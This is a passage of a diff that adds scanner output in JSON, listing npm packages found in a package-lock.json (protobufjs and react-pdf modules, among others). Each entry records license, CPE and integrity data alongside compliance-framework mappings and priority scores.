Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "253d6aca6c381638", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/float 1.0.2", + "title": "@protobufjs/float 1.0.2", + "description": "Package discovered: @protobufjs/float 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "dda6f1aef9d11e58", + "name": "@protobufjs/float", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/float:\\@protobufjs\\/float:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/float@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz", + "integrity": "sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "7699234b047c9f55", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/inquire 1.1.1", + "title": "@protobufjs/inquire 1.1.1", + "description": "Package discovered: @protobufjs/inquire 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a8f805afd5f928e8", + "name": "@protobufjs/inquire", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/inquire:\\@protobufjs\\/inquire:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/inquire@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz", + "integrity": "sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0888dd200a4f8fb9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/path 1.1.2", + "title": "@protobufjs/path 1.1.2", + "description": "Package discovered: @protobufjs/path 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "742d5880151b22a5", + "name": "@protobufjs/path", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/path:\\@protobufjs\\/path:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/path@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz", + "integrity": "sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "37fb5baaf891bf3b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/pool 1.1.0", + "title": "@protobufjs/pool 1.1.0", + "description": "Package discovered: @protobufjs/pool 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2f9166cf527d1f74", + "name": "@protobufjs/pool", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/pool:\\@protobufjs\\/pool:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/pool@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz", + "integrity": "sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "008b4e7e3539d471", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @protobufjs/utf8 1.1.1", + "title": "@protobufjs/utf8 1.1.1", + "description": "Package discovered: @protobufjs/utf8 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "afb917b3027623df", + "name": "@protobufjs/utf8", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@protobufjs\\/utf8:\\@protobufjs\\/utf8:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40protobufjs/utf8@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz", + "integrity": "sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b1e07271de6eec7b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-email/render 0.0.16", + "title": "@react-email/render 0.0.16", + "description": "Package discovered: @react-email/render 0.0.16", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "e1894e7a0de3acac", + "name": "@react-email/render", + "version": "0.0.16", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-email\\/render:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-email\\/render:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_email\\/render:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_email\\/render:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-email/render@0.0.16", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz", + "integrity": "sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ==", + "dependencies": { + "html-to-text": "9.0.5", + "js-beautify": "^1.14.11", + "react-promise-suspense": "0.3.4" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2e3b9f0f7d4d1d7f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/fns 2.2.1", + "title": "@react-pdf/fns 2.2.1", + "description": "Package discovered: @react-pdf/fns 2.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "38462ff4454997a0", + "name": "@react-pdf/fns", + "version": "2.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/fns@2.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz", + "integrity": "sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA==", + "dependencies": { + "@babel/runtime": "^7.20.13" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "06f3ac6357300fe3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/fns 3.1.3", + "title": "@react-pdf/fns 3.1.3", + "description": "Package discovered: @react-pdf/fns 3.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4656650b2a6dd236", + "name": "@react-pdf/fns", + "version": "3.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/fns:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/fns:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/fns@3.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz", + "integrity": "sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0e189b3633f52f28", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/font 2.5.2", + "title": "@react-pdf/font 2.5.2", + "description": 